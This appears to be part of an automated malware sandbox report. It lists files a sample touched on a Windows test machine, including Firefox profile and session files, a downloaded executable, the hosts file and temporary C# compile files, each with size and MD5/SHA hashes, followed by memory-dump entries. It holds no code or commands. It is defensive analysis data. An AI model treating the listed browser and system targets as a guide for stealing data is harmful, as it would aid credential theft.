46f7b5c699bbb30c6c58f83e0df65571cd1b6624003b3867633ec8fa52f8975e

SHA512
4ac2e437e12757ab136e6db926497408432cf6a292c7cd065a553b47a8bee71c5958dc36cb7f7b24f6729f4530acaa5b43737201fc9fcbf74b2f9dd40584d4d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\datareporting\glean\db\data.safe.tmp

Filesize
21KB

MD5
55167e4422152895acf2f2698dd7193f

SHA1
e51813f4170f66518ef4d1f0407337e75b149fec

SHA256
d6479cab91eeffbdea4e7fb39d5d441f7896f6e2c143ff41b95351e2175f7864

SHA512
c258ec0456b9d36da467fbac65f5c6e2afba42487397f8699191071946b3120d8221d00816cfc7a9f658d98dad5bce5141342a5fbf22d54954496a6a0ad75bdc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
1d74d2ef1491e5a3c9e37dd267d1f283

SHA1
fc511cbfc40e6edebf0625090fb8319c28ae920d

SHA256
24bf267a5caa2675fc9feeb7f6a9558fba9cbda209e3f2118706256b4b807d79

SHA512
d4c8bb2fd36859e5ebbd035871ac93fdefc470cd1ad01f9b1a4cc7c6294ad79a9c08c068c82e64ca934cfe8e532cc41fcde19418b91019a0d146911dd841c689

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\datareporting\glean\pending_pings\3532a30f-b221-4972-abd4-277d95d87d16

Filesize
982B

MD5
7fa7bef08b773044a4a685ced74f0727

SHA1
f277dcae0b3f72ebf14b706554dd594cc2bfb940

SHA256
c12a4b172b6a6d7ce56df4cc486124fe123b1fe1cf4e410b366a4f16cf376c8e

SHA512
7db4ecce93fb68adc9b8496220340ce722567f3d86453b354bef43abdf85730ce49d2ec14a2094060df12fa77281ebdf56bb6c892d0e980a3768efac948315de

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\datareporting\glean\pending_pings\d53033f7-69fc-45e6-9d99-7e5acb8c4aa1

Filesize
659B

MD5
388f55ed273de3f518f66eb865839822

SHA1
40eafaf8a449d35d35cc4ce9ea839b31a984bd5a

SHA256
a4f543dc75c1bbce8616df179600753c6a42c7757a0674c1eb6035b6141578cc

SHA512
be63e9ba8cc33466f7351019ea82da85e12192becfd1235d303d648a757d3d15084e95146d75f5becf811ce1e29594c25baae7ec416a51de47dd86f9c3fa4e1e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\prefs-1.js

Filesize
10KB

MD5
680d94a9568278d9ef54c74d221ac191

SHA1
50475ab158dc74b5c29de3f3e28c615bdc8ee94e

SHA256
17400bec2b836ba6450b7f1b2200fb33917aa2710a57c8be670fe08196a0756a

SHA512
1ff2c9b5a91022d355d1a97bb47d68c36bb591ca98ab9edfce5c71aea05498e8814c9cfaacf469f178767243a219f3c9a980a947f3a81cbc73fb09ae8f23b0f8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\prefs.js

Filesize
10KB

MD5
bcb90fdd6f4e200adb9261c27fbf45d7

SHA1
9e99cb21f52384e85f84a145dd7bc226911d70e0

SHA256
3caffd68b873ec9fb4c1b2c9e72cccd51e8f329c131e0e05fa6db268e1d33858

SHA512
cc3eafb85284c921109140ff42a6c507ebaf5f15c888cdd67d96b7328412f0854f5b44ba235a3a0075f0b960ffc94bd58ed1416680b51051963c02ab6061574f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\prefs.js

Filesize
11KB

MD5
35109cf204a78711d89bf62c9d6be30f

SHA1
9acdd846138f7fc5b4c3f420cc77de505de7dd71

SHA256
0d51180b38f60ae122d77a65bf226be3dde79b146a5a487f69e874097491e7c6

SHA512
70744826a2365e94eba58ea96b98057e4efff28d479c0a500bf09641ab4df32cdb3a1700eb25c6c8fde0facfc499eb0c1f39682adcfb718f177402ff1e1861c0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
d3c29011f989477560f9a1d4fc4629eb

SHA1
a63b718a8d0eb1e4c3fc23aeaf753e393ce3bc92

SHA256
c5fec832ea730426746fb30a10b019d530ec670180cf2f21f12132fc4f91fef9

SHA512
e8f660973c7fd7cd511d94815f299d28abae29c6b4f863d69498875879fb5a00e60c01e20deeff0c0284f77ae9ac75dc736e3bfdbb2eb9e2d471365af0019808

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\agdhwm6k.default-release\sessionstore-backups\recovery.baklz4

Filesize
14KB

MD5
c476a122bf786c5c2e72d59e05e138a1

SHA1
18f0a8ebd88f4469140faaae90ea43fcf7604d02

SHA256
a9843e8797109bc93dc0e7a937013d14fd71c257bcf9af9e7dcd1c2494fccc78

SHA512
d26b46c2055c659f79aa6687db095002241c4de273f6db4fbfb1e4bf48aa311aa06f73f2ef274534b5f6b21eb1e9eebeb0b73c9f67d598ce78e8779e6faffa39

Download Submit
C:\Users\Admin\Downloads\Built.0I_KKDBW.exe.part

Filesize
7.6MB

MD5
dd7e819e30addd058d9982a682803978

SHA1
d34e0b0f4bc8a8a60f0c1c33279040e4a1ba5cec

SHA256
1ffc168f780ed5afc618a2909f565d0ec9f7a588f8a15e98bb75d71904329d61

SHA512
f26ef45c1164227d28e2bc6f81db617d385c31f1627542f497d923bbbdbc3df05955f8fe12c7e552ffd5f631d2c79f75b07f4102228a2994431917599bc587d8

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p45jccep\CSCA0CBEE2651AA4915A95D383076AFF1A3.TMP

Filesize
652B

MD5
5cd71a13495b7719677db32696265aa8

SHA1
5e8a1b27cc6fadf72dd9b75987c1905327d2b6d4

SHA256
cbda16718c9de0a8f0e7d949c5e634b412a30fcc9caa63cfc1d9f122349cee2e

SHA512
3dcf7c37624a2c4d73a213f42225a826a925fa73eaeaed956f97386d62d80c2ec150e6f402b2325d1b89109e072ca0fea26fb01cfc4eefd85d6fc97489a2a0fb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p45jccep\p45jccep.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p45jccep\p45jccep.cmdline

Filesize
607B

MD5
5c3e3c4f32ad4b61a167831a2a561d51

SHA1
8e8162550b1640adf0fd1d3c616a1049fd7ba0a6

SHA256
044ebab5038ace32584883dbca38d49afab8e23950eca95c93422d8c951fe67e

SHA512
5e46b701d6be1385da6ed063a9d6807f6525f10b4622d267a15b12ad1565997e39e5d07c62ac2dc969e091313f0fb35c918e82790dfa5631a9adda22d9dd1180

Download Submit
memory/860-219-0x000001E396610000-0x000001E396618000-memory.dmp

Filesize
32KB

Download
memory/1376-307-0x00007FFD29180000-0x00007FFD29233000-memory.dmp

Filesize
716KB

Download
memory/1376-70-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp

Filesize
6.4MB

Download
memory/1376-314-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp

Filesize
1.5MB

Download
memory/1376-319-0x00007FFD29240000-0x00007FFD29773000-memory.dmp

Filesize
5.2MB

Download
memory/1376-317-0x00007FFD38760000-0x00007FFD38793000-memory.dmp

Filesize
204KB

Download
memory/1376-308-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp

Filesize
6.4MB

Download
memory/1376-343-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp

Filesize
6.4MB

Download
memory/1376-372-0x00007FFD29180000-0x00007FFD29233000-memory.dmp

Filesize
716KB

Download
memory/1376-382-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp

Filesize
824KB

Download
memory/1376-383-0x00007FFD29240000-0x00007FFD29773000-memory.dmp

Filesize
5.2MB

Download
memory/1376-381-0x00007FFD38760000-0x00007FFD38793000-memory.dmp

Filesize
204KB

Download
memory/1376-380-0x00007FFD42200000-0x00007FFD4220D000-memory.dmp

Filesize
52KB

Download
memory/1376-379-0x00007FFD3D880000-0x00007FFD3D899000-memory.dmp

Filesize
100KB

Download
memory/1376-378-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp

Filesize
1.5MB

Download
memory/1376-377-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp

Filesize
148KB

Download
memory/1376-376-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp

Filesize
100KB

Download
memory/1376-375-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp

Filesize
172KB

Download
memory/1376-374-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp

Filesize
60KB

Download
memory/1376-373-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp

Filesize
156KB

Download
memory/1376-371-0x00007FFD3D4E0000-0x00007FFD3D4ED000-memory.dmp

Filesize
52KB

Download
memory/1376-370-0x00007FFD34990000-0x00007FFD349A4000-memory.dmp

Filesize
80KB

Download
memory/1376-358-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp

Filesize
6.4MB

Download
memory/1376-204-0x00007FFD29240000-0x00007FFD29773000-memory.dmp

Filesize
5.2MB

Download
memory/1376-203-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp

Filesize
824KB

Download
memory/1376-118-0x00007FFD38760000-0x00007FFD38793000-memory.dmp

Filesize
204KB

Download
memory/1376-25-0x00007FFD29900000-0x00007FFD29F65000-memory.dmp

Filesize
6.4MB

Download
memory/1376-30-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp

Filesize
156KB

Download
memory/1376-32-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp

Filesize
60KB

Download
memory/1376-54-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp

Filesize
172KB

Download
memory/1376-86-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp

Filesize
1.5MB

Download
memory/1376-56-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp

Filesize
100KB

Download
memory/1376-84-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp

Filesize
148KB

Download
memory/1376-77-0x00007FFD34990000-0x00007FFD349A4000-memory.dmp

Filesize
80KB

Download
memory/1376-80-0x00007FFD3D4E0000-0x00007FFD3D4ED000-memory.dmp

Filesize
52KB

Download
memory/1376-83-0x00007FFD29180000-0x00007FFD29233000-memory.dmp

Filesize
716KB

Download
memory/1376-82-0x00007FFD3F8C0000-0x00007FFD3F8D9000-memory.dmp

Filesize
100KB

Download
memory/1376-79-0x00007FFD38D00000-0x00007FFD38D2B000-memory.dmp

Filesize
172KB

Download
memory/1376-76-0x00007FFD42790000-0x00007FFD4279F000-memory.dmp

Filesize
60KB

Download
memory/1376-72-0x00007FFD29240000-0x00007FFD29773000-memory.dmp

Filesize
5.2MB

Download
memory/1376-58-0x00007FFD38A60000-0x00007FFD38A85000-memory.dmp

Filesize
148KB

Download
memory/1376-60-0x00007FFD29780000-0x00007FFD298FF000-memory.dmp

Filesize
1.5MB

Download
memory/1376-62-0x00007FFD3D880000-0x00007FFD3D899000-memory.dmp

Filesize
100KB

Download
memory/1376-73-0x000001D6C7A00000-0x000001D6C7F33000-memory.dmp

Filesize
5.2MB

Download
memory/1376-64-0x00007FFD42200000-0x00007FFD4220D000-memory.dmp

Filesize
52KB

Download
memory/1376-66-0x00007FFD38760000-0x00007FFD38793000-memory.dmp

Filesize
204KB

Download
memory/1376-71-0x00007FFD37CD0000-0x00007FFD37D9E000-memory.dmp

Filesize
824KB

Download
memory/1376-252-0x000001D6C7A00000-0x000001D6C7F33000-memory.dmp

Filesize
5.2MB

Download
memory/1376-74-0x00007FFD3C820000-0x00007FFD3C847000-memory.dmp

Filesize
156KB

Download
memory/4836-934-0x00007FFD3C5A0000-0x00007FFD3C5B9000-memory.dmp

Filesize
100KB

Download
memory/4836-946-0x00007FFD3C820000-0x00007FFD3C82D000-memory.dmp

Filesize
52KB

Download
memory/4836-941-0x00007FFD29030000-0x00007FFD290FE000-memory.dmp

Filesize
824KB

Download
memory/4836-938-0x00007FFD3C850000-0x00007FFD3C85D000-memory.dmp

Filesize
52KB

Download
memory/4836-942-0x00007FFD275D0000-0x00007FFD27B03000-memory.dmp

Filesize
5.2MB

Download
memory/4836-940-0x00007FFD27B10000-0x00007FFD28175000-memory.dmp

Filesize
6.4MB

Download
memory/4836-944-0x00007FFD386D0000-0x00007FFD386E4000-memory.dmp

Filesize
80KB

Download
memory/4836-933-0x00007FFD3C860000-0x00007FFD3C88B000-memory.dmp

Filesize
172KB

Download
memory/4836-948-0x00007FFD28400000-0x00007FFD284B3000-memory.dmp

Filesize
716KB

Download
memory/4836-947-0x00007FFD3C5A0000-0x00007FFD3C5B9000-memory.dmp

Filesize
100KB

Download
memory/4836-945-0x00007FFD3C860000-0x00007FFD3C88B000-memory.dmp

Filesize
172KB

Download
memory/4836-969-0x00007FFD38730000-0x00007FFD38755000-memory.dmp

Filesize
148KB

Download
memory/4836-937-0x00007FFD387B0000-0x00007FFD387C9000-memory.dmp

Filesize
100KB

Download
memory/4836-928-0x00007FFD3D390000-0x00007FFD3D39F000-memory.dmp

Filesize
60KB

Download
memory/4836-1048-0x00007FFD29100000-0x00007FFD2927F000-memory.dmp

Filesize
1.5MB

Download
memory/4836-935-0x00007FFD38730000-0x00007FFD38755000-memory.dmp

Filesize
148KB

Download
memory/4836-943-0x00007FFD3C890000-0x00007FFD3C8B7000-memory.dmp

Filesize
156KB

Download
memory/4836-939-0x00007FFD2F8E0000-0x00007FFD2F913000-memory.dmp

Filesize
204KB

Download
memory/4836-936-0x00007FFD29100000-0x00007FFD2927F000-memory.dmp

Filesize
1.5MB

Download
memory/4836-1072-0x00007FFD387B0000-0x00007FFD387C9000-memory.dmp

Filesize
100KB

Download
memory/4836-927-0x00007FFD3C890000-0x00007FFD3C8B7000-memory.dmp

Filesize
156KB

Download
memory/4836-926-0x00007FFD27B10000-0x00007FFD28175000-memory.dmp

Filesize
6.4MB

Download
memory/4836-1161-0x00007FFD29100000-0x00007FFD2927F000-memory.dmp

Filesize
1.5MB

Download
memory/4836-1170-0x00007FFD28400000-0x00007FFD284B3000-memory.dmp

Filesize
716KB

Download
memory/4836-1155-0x00007FFD27B10000-0x00007FFD28175000-memory.dmp

Filesize
6.4MB

Download
memory/4836-1131-0x00007FFD29030000-0x00007FFD290FE000-memory.dmp

Filesize
824KB

Download
memory/4836-1132-0x00007FFD275D0000-0x00007FFD27B03000-memory.dmp

Filesize
5.2MB

Download
memory/4836-1129-0x00007FFD2F8E0000-0x00007FFD2F913000-memory.dmp

Filesize
204KB

Download
memory/4896-113-0x00007FFD28450000-0x00007FFD28F12000-memory.dmp

Filesize
10.8MB

Download
memory/4896-88-0x00007FFD28450000-0x00007FFD28F12000-memory.dmp

Filesize
10.8MB

Download
memory/4896-87-0x00007FFD28450000-0x00007FFD28F12000-memory.dmp

Filesize
10.8MB

Download
memory/4896-85-0x00007FFD28453000-0x00007FFD28455000-memory.dmp

Filesize
8KB

Download
memory/5928-89-0x00000148CD120000-0x00000148CD142000-memory.dmp

Filesize
136KB

Download